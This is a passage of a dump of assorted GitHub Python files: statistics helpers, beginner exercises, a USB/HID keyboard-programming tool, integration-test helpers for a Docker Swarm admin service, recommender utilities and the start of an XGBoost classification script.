-norm.ppf(alpha/2) # z критическое\n eps = z_crit * (x_p * (1 - x_p) / n) ** 0.5 # error\n lower_bound = x_p - eps # left (bottom) border\n upper_bound = x_p + eps # right (top) border\n return round(lower_bound * 100, digits), round(upper_bound * 100, digits)\n \n \ndef diff_proportions_conf_interval(n, xp, gamma=0.95, digits=2):\n \"\"\"Calculation confidence interval of proportions difference\n \n Args:\n n (list): list of sample size for A and B\n xp (list): list of sample proportion for A and B respectively\n gamma (float, optional): reliability level. Default is 0.95\n digits (int, optional): the number of decimals to use when\n rounding the number. Default is 2\n \n Returns:\n Confidence interval interval of proportions difference, %\n \"\"\" \n from scipy.stats import norm\n \n alpha = 1 - gamma \n diff = xp[1] - xp[0] # sample difference of convertions for groups A and B\n z_crit = -norm.ppf(alpha/2)\n eps = z_crit * (xp[0] * (1 - xp[0])/n[0] + xp[1] * (1 - xp[1])/n[1]) ** 0.5\n lower_bound = diff - eps # left (bottom) border\n upper_bound = diff + eps # right (top) border\n \n return round(lower_bound *100, digits), round(upper_bound * 100, digits) \n","repo_name":"Talic13th/SFlearning","sub_path":"SF/EDA_5/confidence_interval.py","file_name":"confidence_interval.py","file_ext":"py","file_size_in_byte":3885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7375928143","text":"pessoas = []\ndado = []\nmaior = menor = 0\nwhile True:\n dado.append(str(input('Nome: ')))\n dado.append(float(input('Peso: ')))\n if len(pessoas) == 0:\n maior = menor = dado[1]\n else:\n if dado[1] > maior:\n maior = dado[1]\n if dado[1] < menor:\n menor = dado[1]\n pessoas.append(dado[:])\n dado.clear()\n continuar = ' '\n while continuar not in 'SN':\n continuar = str(input('Quer continuar? [S/N] ')).strip().upper()[0]\n if continuar in 'N':\n break\nprint(pessoas)\nprint(f'Ao todo, você cadastrou {len(pessoas)} pessoas.')\nprint(f'O maior peso foi {maior}Kg. Peso de ', end='')\nfor p in pessoas:\n if p[1] == maior:\n print(f'[{p[0]}]', end=' ')\nprint()\nprint(f'O menor peso foi {menor}Kg. Peso de ', end='')\nfor p in pessoas:\n if p[1] == menor:\n print(f'[{p[0]}]')\n","repo_name":"Rafael-Melo/CursoEmVideo","sub_path":"ex084_peso.py","file_name":"ex084_peso.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"1528241978","text":"import logging\n\nimport hid\nimport usb.util\n\n\nclass Keyboard(object):\n # -- start commands\n # protocol \"alpha\"\n COMMAND_START = 0x00\n GET_PROTOCOL_VERSION = 0x01\n GET_KEYBOARD_VALUE = 0x02\n SET_KEYBOARD_VALUE = 0x03\n DYNAMIC_KEYMAP_GET_KEYCODE = 0x04\n DYNAMIC_KEYMAP_SET_KEYCODE = 0x05\n DYNAMIC_KEYMAP_CLEAR_ALL = 0x06\n BACKLIGHT_CONFIG_SET_VALUE = 0x07\n BACKLIGHT_CONFIG_GET_VALUE = 0x08\n BACKLIGHT_CONFIG_SAVE = 0x09\n EEPROM_RESET = 0x0a\n BOOTLOADER_JUMP = 0x0b\n\n # protocol \"beta\"\n DYNAMIC_KEYMAP_MACRO_GET_COUNT = 0x0c\n DYNAMIC_KEYMAP_MACRO_GET_BUFFER_SIZE = 0x0d\n DYNAMIC_KEYMAP_MACRO_GET_BUFFER = 0x0e\n DYNAMIC_KEYMAP_MACRO_SET_BUFFER = 0x0f\n DYNAMIC_KEYMAP_MACRO_RESET = 0x10\n DYNAMIC_KEYMAP_GET_LAYER_COUNT = 0x11\n DYNAMIC_KEYMAP_GET_BUFFER = 0x12\n DYNAMIC_KEYMAP_SET_BUFFER = 0x13\n # -- end commands\n\n # -- start backlight values ids\n # protocol \"alpha\"\n BACKLIGHT_USE_SPLIT_BACKSPACE = 0x01\n BACKLIGHT_USE_SPLIT_LEFT_SHIFT = 0x02\n BACKLIGHT_USE_SPLIT_RIGHT_SHIFT = 0x03\n BACKLIGHT_USE_7U_SPACEBAR = 0x04\n BACKLIGHT_USE_ISO_ENTER = 0x05\n BACKLIGHT_DISABLE_HHKB_BLOCKER_LEDS = 0x06\n BACKLIGHT_DISABLE_WHEN_USB_SUSPENDED = 0x07\n BACKLIGHT_DISABLE_AFTER_TIMEOUT = 0x08\n BACKLIGHT_BRIGHTNESS = 0x09\n BACKLIGHT_EFFECT = 0x0a\n BACKLIGHT_EFFECT_SPEED = 0x0b\n BACKLIGHT_COLOR_1 = 0x0c\n BACKLIGHT_COLOR_2 = 0x0d\n BACKLIGHT_CAPS_LOCK_INDICATOR_COLOR = 0x0e\n BACKLIGHT_CAPS_LOCK_INDICATOR_ROW_Col = 0x0f\n BACKLIGHT_LAYER_1_INDICATOR_COLOR = 0x10\n BACKLIGHT_LAYER_1_INDICATOR_ROW_COL = 0x11\n BACKLIGHT_LAYER_2_INDICATOR_COLOR = 0x12\n BACKLIGHT_LAYER_2_INDICATOR_ROW_COL = 0x13\n BACKLIGHT_LAYER_3_INDICATOR_COLOR = 0x14\n BACKLIGHT_LAYER_3_INDICATOR_ROW_COL = 0x15\n BACKLIGHT_ALPHAS_MODS = 0x16\n\n # protocol \"beta\"\n BACKLIGHT_CUSTOM_COLOR = 0x17\n # -- end backlight values ids\n\n PROTOCOLS = {\n 7: 'alpha',\n 8: 'beta',\n 9: 'gamma'\n }\n\n BL_PROTOCOLS = {\n 0: 'none',\n 1: 'wilba'\n }\n\n def __init__(self, device, name, tag, rows, cols, use_hid, **kwargs):\n self.name = name\n self.tag = tag\n self.rows = rows\n self.cols = cols\n\n self.logger = logging.getLogger(__name__)\n\n self._layers = None\n self._macro_buffer_size = None\n self._macro_count = None\n self.macros = []\n\n self.use_hid = use_hid\n self.device = device\n\n if not self.use_hid:\n self.find_endpoint()\n\n if self.device.is_kernel_driver_active(self.interface):\n self.device.detach_kernel_driver(self.interface)\n\n try:\n usb.util.claim_interface(self.device, self.interface)\n self.logger.info('Claimed device')\n except Exception as e:\n self.logger.debug('Could not claim device: %s',\n str(e))\n else:\n self.find_hidpath()\n\n self.protocol = self.get_protocol()\n self._load_macros()\n\n def dump(self):\n self.logger.info('Name: %s', self.name)\n self.logger.info('Wiring: %sx%s', self.cols, self.rows)\n\n protocol = self.PROTOCOLS.get(self.protocol,\n 'Unknown: %d' % self.protocol)\n self.logger.info('Protocol: %s', protocol)\n self.logger.info('Layers: %s', self.layers)\n self.logger.info('Macros: %s', self.macro_count)\n if self.macro_count:\n self.logger.info('Macro buffer size: %s', self.macro_bytes)\n for idx, macro in enumerate(self.macros):\n self.logger.info('Macro %d: %s', idx, macro)\n\n def get_protocol(self):\n result = self._send_command(self.GET_PROTOCOL_VERSION)\n retval = (result[1] * 256) + result[2]\n return retval\n\n def bootloader(self):\n self._send_command(self.BOOTLOADER_JUMP)\n\n def save(self):\n self._send_command(self.BACKLIGHT_CONFIG_SAVE)\n\n @property\n def layers(self):\n if self._layers is None:\n if self.protocol == 7:\n self._layers = 3\n result = self._send_command(self.DYNAMIC_KEYMAP_GET_LAYER_COUNT)\n self._layers = result[1]\n return self._layers\n\n @property\n def macro_bytes(self):\n if self.protocol == 7:\n self._macro_buffer_size = 0\n else:\n result = self._send_command(\n self.DYNAMIC_KEYMAP_MACRO_GET_BUFFER_SIZE)\n self._macro_buffer_size = result[1] << 8 | result[2]\n return self._macro_buffer_size\n\n @property\n def macro_count(self):\n if self.protocol == 7:\n self._macro_count = 0\n else:\n result = self._send_command(self.DYNAMIC_KEYMAP_MACRO_GET_COUNT)\n self._macro_count = result[1]\n return self._macro_count\n\n def set_macro(self, index, value):\n if index > self.macro_count:\n raise RuntimeError('Macro %d out of range' % index)\n\n value = bytes(value, 'latin1').decode('unicode_escape')\n self.macros[index] = value\n\n def _load_macros(self):\n if self.macro_count == 0:\n return\n\n macro_bytes = self.macro_bytes\n if not macro_bytes:\n return\n\n buffer = bytearray()\n left_to_read = macro_bytes\n offset = 0\n\n while(left_to_read):\n to_read = min(left_to_read, 28)\n next = self._send_command(\n self.DYNAMIC_KEYMAP_MACRO_GET_BUFFER,\n (offset & 0xFF00) >> 8,\n offset & 0xFF,\n to_read & 0xFF)\n\n data = next[4:4+to_read]\n buffer += data\n left_to_read -= to_read\n offset += to_read\n\n macro = 0\n current_macro = bytearray()\n offset = 0\n\n while(macro < self.macro_count):\n if buffer[offset] != 0:\n current_macro.append(buffer[offset])\n else:\n self.logger.debug('Macro %d: %s', macro, current_macro)\n self.macros.append(current_macro.decode('latin1'))\n current_macro = bytearray()\n macro += 1\n\n offset += 1\n\n def save_macros(self):\n macro_bytes = self.macro_bytes\n if not macro_bytes:\n return\n\n buffer = bytearray()\n for macro in range(self.macro_count):\n buffer += bytearray(self.macros[macro].encode('latin1'))\n buffer.append(0)\n\n if len(buffer) > self.macro_bytes:\n raise RuntimeError('macro too large')\n\n left_to_write = len(buffer)\n offset = 0\n\n while(left_to_write):\n to_write = min(left_to_write, 28)\n self._send_command(\n self.DYNAMIC_KEYMAP_MACRO_SET_BUFFER,\n (offset & 0xFF00) >> 8,\n offset & 0xFF,\n to_write & 0xFF,\n buffer[offset:offset+to_write])\n\n left_to_write -= to_write\n offset += to_write\n\n def set_key(self, layer, row, col, value):\n self._send_command(\n self.DYNAMIC_KEYMAP_SET_KEYCODE,\n layer, row, col, (value & 0xFF00) >> 8, value & 0xFF)\n\n def keyboard_map_beta(self, callback=None):\n buffer = bytearray()\n\n buffer_size = self.layers * self.rows * self.cols * 2\n left_to_read = buffer_size\n offset = 0\n\n while(left_to_read):\n to_read = min(left_to_read, 28)\n next = self._send_command(\n self.DYNAMIC_KEYMAP_GET_BUFFER,\n (offset & 0xFF00) >> 8,\n offset & 0xFF,\n to_read & 0xFF)\n\n data = next[4:4+to_read]\n buffer += data\n left_to_read -= to_read\n offset += to_read\n\n if callback is not None:\n read = buffer_size - left_to_read\n percent = float(read) / float(buffer_size)\n callback(percent)\n\n self.logger.debug('Map: %s bytes (expected %s): %s',\n len(buffer),\n self.layers * self.rows * self.cols * 2,\n ' '.join('%02x' % x for x in buffer))\n\n # now, split it out\n items = []\n pos = 0\n for layer in range(self.layers):\n items.append([])\n for row in range(self.rows):\n items[layer].append([])\n for col in range(self.cols):\n items[layer][row].append(\n buffer[pos] << 8 | buffer[pos+1])\n pos += 2\n\n return items\n\n def keyboard_map(self, callback=None):\n if self.protocol > 7: # beta or better\n return self.keyboard_map_beta(callback=callback)\n\n items = []\n\n total_items = self.layers * self.rows * self.cols\n read = 0\n\n for layer in range(self.layers):\n items.append([])\n\n for row in range(self.rows):\n items[layer].append([])\n self.logger.debug('Reading layer %d, row %d' % (layer, row))\n\n for col in range(self.cols):\n result = self._send_command(\n self.DYNAMIC_KEYMAP_GET_KEYCODE,\n layer, row, col)\n items[layer][row].append(result[4] * 256 + result[5])\n read += 1\n\n if callback is not None:\n percent = float(read) / float(total_items)\n callback(percent)\n\n return items\n\n @property\n def effect(self):\n result = self._send_command(self.BACKLIGHT_CONFIG_GET_VALUE,\n self.BACKLIGHT_EFFECT, 0x00)\n return result[2]\n\n @effect.setter\n def effect(self, value):\n self._send_command(self.BACKLIGHT_CONFIG_SET_VALUE,\n self.BACKLIGHT_EFFECT, value)\n\n def _send_command(self, *args):\n bufsize = 32\n out_buf = [0x00] * bufsize\n ofs = 0\n\n for item in args:\n if isinstance(item, int):\n out_buf[ofs] = item\n ofs += 1\n elif isinstance(item, str):\n for char in item:\n out_buf[ofs] = ord(char)\n ofs += 1\n elif isinstance(item, bytearray):\n for char in item:\n out_buf[ofs] = char\n ofs += 1\n else:\n raise RuntimeError('bad cmd')\n\n out_buf = (''.join([chr(x) for x in out_buf])).encode('latin1')\n if len(out_buf) != 32:\n raise RuntimeError('Buffer too big!')\n\n self.logger.debug('Send: %d bytes: %s',\n len(out_buf),\n ' '.join('%02x' % x for x in out_buf))\n\n if not self.use_hid:\n result = self.device.write(self.out_ep, out_buf, timeout=1000)\n\n retry_count = 0\n while retry_count <= 1:\n if self.use_hid:\n result = self.hid_device.write(out_buf)\n in_buf = self.hid_device.read(32, 300) # 1s timeout\n else:\n in_buf = self.device.read(self.in_ep, 32, timeout=1000)\n\n if len(in_buf) != 0:\n break\n retry_count += 1\n # self.logger.info(f'Bad read: {len(in_buf)} bytes... retrying...')\n\n self.logger.debug('Recv: %s bytes: %s',\n len(in_buf),\n ' '.join('%02x' % x for x in in_buf))\n return in_buf\n\n def find_hidpath(self):\n self.logger.info(f'Probing for raw hid device among {self.device}')\n for item in self.device:\n self.hid_device = hid.Device(path=item)\n try:\n buf = self._send_command(self.GET_PROTOCOL_VERSION)\n pver = buf[1] * 256 + buf[2]\n except Exception:\n self.logger.info(f'Timeout for {item}')\n self.hid_device.close()\n continue\n\n if pver not in self.PROTOCOLS:\n self.logger.info(f'Invalid protocol: {pver}')\n else:\n self.logger.info(f'Using path {item}')\n return\n\n raise RuntimeError('Cannot find suitable hid device')\n\n def find_endpoint(self):\n self.logger.debug('Probing for endpoint')\n\n cfg = self.device.get_active_configuration()\n\n for intf in cfg:\n self.logger.debug('Iface %s', intf.bInterfaceNumber)\n\n ep_addrs = []\n\n for ep in intf:\n ep_addrs.append(ep.bEndpointAddress)\n self.logger.debug(' %s', ep.bEndpointAddress)\n\n if len(ep_addrs) == 2:\n ep1 = ep_addrs[0]\n ep2 = ep_addrs[1]\n\n self.out_ep = ep1 if ep1 < 0x7f else ep2\n self.in_ep = ep2 if self.out_ep == ep1 else ep1\n self.interface = intf.bInterfaceNumber\n\n self.logger.info('Using interface %d: in %d/out %d',\n self.interface, self.in_ep, self.out_ep)\n break\n\n if not self.interface:\n raise RuntimeError('No good interface found')\n","repo_name":"rpedde/kb_prog","sub_path":"kbprog/keyboard.py","file_name":"keyboard.py","file_ext":"py","file_size_in_byte":13324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14539274481","text":"#Алхасова Разият Запировна \n#Вариант №2\nimport random \nprint ('Программа случайным образом отображает название одного из трех поросят ')\npigs = [\n 'nif',\n 'nuf',\n 'naf']\nprint (random.choice(pigs)) \ninput (' Нажмите Enter для выхода')","repo_name":"jusssasha/test","sub_path":"inb/Alkhasova/ARlab5.py","file_name":"ARlab5.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"9945122858","text":"from stacks.stack import Stack\n\ntp = None\nstk = Stack()\nx = list(map(int, input().split(' ')))\nn = len(x)\ni = 0\nmaxi = 0\nwhile (i < n):\n if stk.is_empty() or x[stk.peek()] <= x[i]:\n stk.push(i)\n i += 1\n\n else:\n tp = stk.peek()\n stk.pop()\n if stk.is_empty():\n temp = x[tp] * i\n else:\n temp = x[tp] * (i - stk.peek() - 1)\n if maxi < temp:\n maxi = temp\nwhile not stk.is_empty():\n tp = stk.peek()\n stk.pop()\n if stk.is_empty():\n temp = x[tp] * i\n else:\n\n temp = x[tp] * (i - stk.peek() - 1)\n if maxi < temp:\n print(maxi)\n maxi = temp\n\nprint(maxi)\n","repo_name":"thepavankoushik/pure-python","sub_path":"stacks/largest_rect_area_hist.py","file_name":"largest_rect_area_hist.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3102922401","text":"import asyncio\nimport os\nimport shutil\nimport socket\nimport subprocess\nimport uuid\nfrom aiohttp.test_utils import (\n AioHTTPTestCase, TestClient, TestServer, setup_test_loop,\n unittest_run_loop)\nfrom aiosparql.client import SPARQLClient\nfrom aiosparql.syntax import escape_any, IRI, Node, RDF, Triples\nfrom copy import copy\nfrom os import environ as ENV\nfrom textwrap import dedent\nfrom yarl import URL\n\nimport muswarmadmin.delta\nimport muswarmadmin.main\nfrom muswarmadmin.actionscheduler import ActionScheduler\nfrom muswarmadmin.prefixes import Dct, Doap, Mu, Stackbuilder, SwarmUI\n\n__all__ = ['IntegrationTestCase', 'unittest_run_loop']\n\n\n_sentinel = object()\n\n\n# NOTE: temporary fix: ensure a child watcher is set before running test\ndef setup_test_loop(loop_factory=asyncio.new_event_loop): # noqa\n \"\"\"Create and return an asyncio.BaseEventLoop\n instance.\n\n The caller should also call teardown_test_loop,\n once they are done with the loop.\n \"\"\"\n loop = loop_factory()\n asyncio.set_event_loop(None)\n policy = asyncio.get_event_loop_policy()\n watcher = asyncio.SafeChildWatcher()\n watcher.attach_loop(loop)\n policy.set_child_watcher(watcher)\n return loop\n\n\nclass FixedPortTestServer(TestServer):\n @asyncio.coroutine\n def start_server(self, loop=None, **kwargs):\n if self.server:\n return\n self._loop = loop\n self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self._socket.bind((\"0.0.0.0\", 80))\n self.port = self._socket.getsockname()[1]\n self._ssl = None\n self.scheme = 'http'\n self._root = URL('{}://{}:{}'.format(self.scheme,\n self.host,\n self.port))\n\n handler = yield from self._make_factory(**kwargs)\n self.server = yield from self._loop.create_server(\n handler, ssl=self._ssl, sock=self._socket)\n\n # NOTE: temporary fix: ensure that the event loop is set in the app before\n # firing on_startup\n @asyncio.coroutine\n def _make_factory(self, **kwargs):\n self.app._set_loop(self._loop) # here\n yield from self.app.startup()\n self.handler = self.app.make_handler(loop=self._loop, **kwargs)\n return self.handler\n\n\nclass IntegrationTestCase(AioHTTPTestCase):\n example_repo = \\\n \"https://github.com/big-data-europe/mu-swarm-ui-testing.git\"\n sparql_timeout = 5\n\n async def get_application(self):\n app = copy(muswarmadmin.main.app)\n app.sparql_timeout = self.sparql_timeout\n return app\n\n async def scheduler_complete(self, key):\n if key not in ActionScheduler.executers:\n raise KeyError(\n \"ActionScheduler for key %s does not exist. \"\n \"HINT: the ActionScheduler is removed automatically after \"\n \"calling this function\" % key)\n await ActionScheduler.executers[key].cancel()\n\n async def wait_scheduler(self, key, timeout=3):\n for i in range(timeout * 5):\n if key in ActionScheduler.executers:\n break\n await asyncio.sleep(0.2)\n await self.scheduler_complete(key)\n\n def uuid4(self):\n return str(uuid.uuid4()).replace(\"-\", \"\").upper()\n\n def resource(self, type_, id):\n return (\n muswarmadmin.main.Application.base_resource + \"%s/%s\" % (type_, id)\n )\n\n def project_exists(self, project_name):\n return os.path.exists(\"/data/%s\" % project_name)\n\n async def triple_exists(self, s=None, p=None, o=None):\n s = escape_any(s) if s is not None else \"?s\"\n p = escape_any(p) if p is not None else \"?p\"\n o = escape_any(o) if o is not None else \"?o\"\n result = await self.app.sparql.query(\n \"ASK FROM {{graph}} WHERE { {{}} {{}} {{}} }\", s, p, o)\n return result['boolean']\n\n async def prepare_triples(self, triples):\n await self.db.update(\n \"INSERT DATA { GRAPH {{graph}} { {{}} } }\", Triples(triples))\n\n async def insert_triples(self, triples):\n await self.app.sparql.update(\n \"INSERT DATA { GRAPH {{graph}} { {{}} } }\", Triples(triples))\n\n async def prepare_node(self, node):\n await self.prepare_triples([node])\n\n async def insert_node(self, node):\n await self.insert_triples([node])\n\n async def remove_triples(self, s=None, p=None, o=None):\n s = escape_any(s) if s is not None else \"?s\"\n p = escape_any(p) if p is not None else \"?p\"\n o = escape_any(o) if o is not None else \"?o\"\n await self.app.sparql.update(\n \"\"\"\n WITH {{graph}}\n DELETE {\n {{s}} {{p}} {{o}}\n }\n WHERE {\n {{s}} {{p}} {{o}}\n }\"\"\", s=s, p=p, o=o)\n\n async def describe(self, subject):\n return await self.app.sparql.query(\"DESCRIBE {{}} FROM {{graph}}\",\n subject)\n\n async def create_drc_node(self, repository_iri=_sentinel,\n location=_sentinel):\n if repository_iri is _sentinel:\n repository_iri, repository_id = \\\n await self.create_repository(location=location)\n else:\n s_repository_iri = str(repository_iri)\n repository_id = s_repository_iri.split('/')[-1][:-1]\n drc_text = dedent(\"\"\"\\\n version: \"2\"\n services:\n service1:\n image: busybox\n command: \"sleep 60\"\n service2:\n image: busybox\n command: \"sleep 60\"\n \"\"\")\n drc_id = self.uuid4()\n d_iri = IRI(\"http://stack-builder.big-data-europe.eu/resources/\")\n drc_iri = d_iri + \"%s/%s\" % (\"docker-composes\", drc_id)\n drc_title = \"stack_{}_drc_{}\".format(repository_id, drc_id)\n drc_node = Node(drc_iri, {\n RDF.type: Stackbuilder.DockerCompose,\n Mu.uuid: drc_id,\n Dct.title: drc_title,\n Stackbuilder.text: drc_text\n })\n\n await self.insert_triples([\n drc_node,\n (repository_iri, SwarmUI.dockerComposeFile, drc_node),\n ])\n return (drc_iri, drc_id)\n\n async def create_repository(self, location=_sentinel):\n if location is _sentinel:\n location = self.example_repo\n repository_id = self.uuid4()\n repository_iri = self.resource(\"stacks\", repository_id)\n await self.insert_node(Node(repository_iri, {\n RDF.type: Doap.Stack,\n Mu.uuid: repository_id,\n Doap.location: location,\n }))\n return (repository_iri, repository_id)\n\n async def create_pipeline(self, repository_iri=_sentinel,\n location=_sentinel):\n if repository_iri is _sentinel:\n repository_iri, repository_id = \\\n await self.create_repository(location=location)\n pipeline_id = self.uuid4()\n pipeline_iri = self.resource(\"pipeline-instances\", pipeline_id)\n pipeline_node = Node(pipeline_iri, {\n RDF.type: SwarmUI.Pipeline,\n Mu.uuid: pipeline_id,\n })\n await self.insert_triples([\n pipeline_node,\n (repository_iri, SwarmUI.pipelines, pipeline_node),\n ])\n await self.scheduler_complete(pipeline_id)\n return (pipeline_iri, pipeline_id)\n\n async def get_services(self, project_name):\n result = await self.app.sparql.query(\n \"\"\"\n SELECT ?name ?service ?uuid\n FROM {{graph}}\n WHERE {\n ?pipeline mu:uuid {{}} ;\n swarmui:services ?service .\n\n ?service mu:uuid ?uuid ;\n dct:title ?name .\n }\n \"\"\", escape_any(project_name))\n return {\n x['name']['value']: (IRI(x['service']['value']),\n x['uuid']['value'])\n for x in result['results']['bindings']\n }\n\n async def prepare_database(self):\n await self.db.update(\"CLEAR GRAPH {{graph}}\")\n\n def setUp(self):\n self.loop = setup_test_loop()\n\n self.db = SPARQLClient(endpoint=\"http://database:8890/sparql\",\n graph=IRI(ENV['MU_APPLICATION_GRAPH']),\n loop=self.loop,\n read_timeout=self.sparql_timeout)\n self.loop.run_until_complete(self.prepare_database())\n\n self.app = self.loop.run_until_complete(self.get_application())\n\n self.server = FixedPortTestServer(self.app)\n self.client = self.loop.run_until_complete(\n self._get_client(self.server))\n\n self.loop.run_until_complete(self.client.start_server())\n\n def tearDown(self):\n self.loop.run_until_complete(self.db.close())\n super().tearDown()\n for project_name in os.listdir(\"/data\"):\n project_path = \"/data/%s\" % project_name\n subprocess.call([\"docker-compose\", \"down\"], cwd=project_path)\n shutil.rmtree(project_path)\n\n # NOTE: temporary fix, will be fixed with the next aiohttp release\n @asyncio.coroutine\n def _get_client(self, app):\n \"\"\"Return a TestClient instance.\"\"\"\n return TestClient(app, loop=self.loop)\n\n async def assertNode(self, subject, values):\n result = await self.describe(subject)\n self.assertTrue(result and result[subject])\n for p, o in values.items():\n found_values = [x['value'] for x in result[subject][p]]\n self.assertEqual(\n len(found_values), 1,\n \"multiple predicates {} in node's subject {}: {!r}\".format(\n p, subject, found_values))\n self.assertEqual(\n found_values[0], o,\n \"predicate {} in node {} has value {}, expected {}\".format(\n p, subject, found_values[0], o))\n\n async def assertStatus(self, subject, status):\n await self.assertNode(subject, {SwarmUI.status: status})\n\n async def assertExists(self, s=None, p=None, o=None):\n self.assertTrue(await self.triple_exists(s, p, o))\n\n async def assertNotExists(self, s=None, p=None, o=None):\n self.assertFalse(await self.triple_exists(s, p, o))\n","repo_name":"big-data-europe/mu-swarm-admin-service","sub_path":"tests/integration/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":10448,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"12843589946","text":"import numpy as np\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom load_config import get_attribute\r\n\r\n\r\nclass WeightMSELoss(nn.Module):\r\n\r\n def __init__(self, weights=None):\r\n super(WeightMSELoss, self).__init__()\r\n self.weights = weights\r\n if weights is not None:\r\n self.weights = torch.sqrt(torch.tensor(weights))\r\n self.mse_loss = nn.MSELoss(reduction='sum')\r\n\r\n def forward(self, truth, predict):\r\n # predict = torch.softmax(predict, dim=-1)\r\n # predict = torch.sigmoid(predict)\r\n truth = truth.float()\r\n if self.weights is not None:\r\n self.weights = self.weights.to(truth.device)\r\n predict = predict * self.weights\r\n truth = truth * self.weights\r\n\r\n loss = self.mse_loss(predict, truth)\r\n # loss = loss.requires_grad_()\r\n return loss\r\n\r\n\r\ndef get_attn_pad_mask(seq_q, seq_k): #把pad与正常的词区分开\r\n\r\n batch_size, len_q = seq_q.size()\r\n batch_size, len_k = seq_k.size()\r\n\r\n pad_attn_mask = seq_k.data.eq(0).unsqueeze(1) \r\n return pad_attn_mask.expand(batch_size, len_q, len_k) \r\n\r\ndef get_item_pad_mask(seq_q, seq_k):\r\n\r\n batch_size, qbasket_num, qitem_num = seq_q.size()\r\n batch_size, kbasket_num, kitem_num = seq_k.size()\r\n pad_mask = seq_k.data.eq(0).unsqueeze(2)\r\n return pad_mask.expand(batch_size, qbasket_num, qitem_num, kitem_num)\r\n\r\n\r\n\r\n\r\ndef get_attn_subsequence_mask(seq):\r\n\r\n attn_shape = [seq.size(0), seq.size(1), seq.size(1)]\r\n subsequence_mask = np.triu(np.ones(attn_shape), k=1) \r\n subsequence_mask = torch.from_numpy(subsequence_mask).byte()\r\n return subsequence_mask \r\n\r\n\r\ndef save_model(model, model_path):\r\n torch.save(model.state_dict(), model_path)\r\n\r\n\r\ndef get_txt_mask(txt_data, user_data):\r\n user_txts = []\r\n user_txt_masks = []\r\n for user in user_data:\r\n txt = torch.tensor(txt_data[user[4:]][0])\r\n mask = torch.tensor(()).new_ones(len(txt))\r\n mask = txt * mask\r\n for idx, x in enumerate(mask):\r\n if x > 0:\r\n mask[idx] = 1\r\n user_txts.append(txt)\r\n user_txt_masks.append(mask)\r\n user_txts = torch.stack(user_txts)\r\n user_txt_masks = torch.stack(user_txt_masks)\r\n return user_txts, user_txt_masks.unsqueeze(2)\r\n\r\n\r\ndef get_truth_data(truth_data):\r\n truth_list = []\r\n for basket in truth_data:\r\n one_hot_items = F.one_hot(basket, num_classes=get_attribute(\"items_total\"))\r\n one_hot_basket, _ = torch.max(one_hot_items, dim=-2)\r\n truth_list.append(one_hot_basket)\r\n truth = torch.stack(truth_list)\r\n return truth\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"paopaoofyjz/NDMARec","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"36616222763","text":"\"\"\"\nauthor : Franklin Gallardo\ndate : 09-Jul-2021\n\"\"\"\nimport time\nfrom datetime import datetime\n\nTIME_WAIT = 5 # seconds time\n\n\n# process time\ndef format_readable_date():\n date_begin = datetime.now() # start process\n time.sleep(TIME_WAIT) # wait\n date_end = datetime.now() # end process\n date_process = date_end - date_begin # timedelta object\n print(hour_min_sec_micro(date_process))\n\n\n# format human\ndef hour_min_sec_micro(delta):\n hours, remainder = divmod(delta.seconds, 3600) # hours\n minutes, seconds = divmod(remainder, 60) # minutes and seconds\n return '({:02})hours:({:02})minutes:({:02})seconds ({:06})micro' \\\n .format(int(hours), int(minutes), int(seconds), int(delta.microseconds))\n\n\n# main method.\nif __name__ == '__main__':\n format_readable_date()\n","repo_name":"fgallard23/formatreadable","sub_path":"format_human_date.py","file_name":"format_human_date.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5395337716","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 10 16:30:48 2019\n\n@author: adityavyas\n\"\"\"\n# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport random\nimport pickle\n\ndef get_dataset():\n \n # Importing the dataset\n dataset = pd.read_csv('data/TCGA_data.csv')\n \n #DATA Cleaning\n dataset= dataset.drop(columns=\"Unnamed: 0\") #CLEANING\n dataset= dataset.drop(columns=\"sample_barcode\") #CLEANING\n \n dataset.dropna(subset=['project_name'], how='all', inplace = True)\n \n dataset.drop(dataset.loc[dataset['gender']==\"MALE\"].index, inplace=True)\n \n dataset[\"project_name\"] = np.where(dataset[\"project_name\"]==\"TCGA-BRCA\",1,0)\n return dataset\n\n# dataset[\"project_name\"].describe()\n\ndef divide(dataset):\n #Dividing the dataset\n X = dataset.iloc[:, 2:]\n y = dataset.iloc[:, 0]\n \n # Splitting the dataset into the Training set and Test set\n from sklearn.model_selection import train_test_split\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\n \n return [X_train, X_test, y_train, y_test]\n\n\ndef run_xgboost(X_train,y_train,X_test,y_test):\n # Fitting XGBoost to the Training set\n from xgboost import XGBClassifier\n classifier = XGBClassifier()\n classifier.fit(X_train, y_train)\n \n # Predicting the Test set results\n y_pred = classifier.predict(X_test)\n \n# # Making the Confusion Matrix\n# from sklearn.metrics import confusion_matrix\n# cm = confusion_matrix(y_test, y_pred)\n \n # Applying k-Fold Cross Validation\n from sklearn.model_selection import cross_val_score\n accuracies = cross_val_score(estimator = classifier, X = X_train, y = y_train, cv = 10)\n# accuracies.mean()\n# accuracies.std()\n 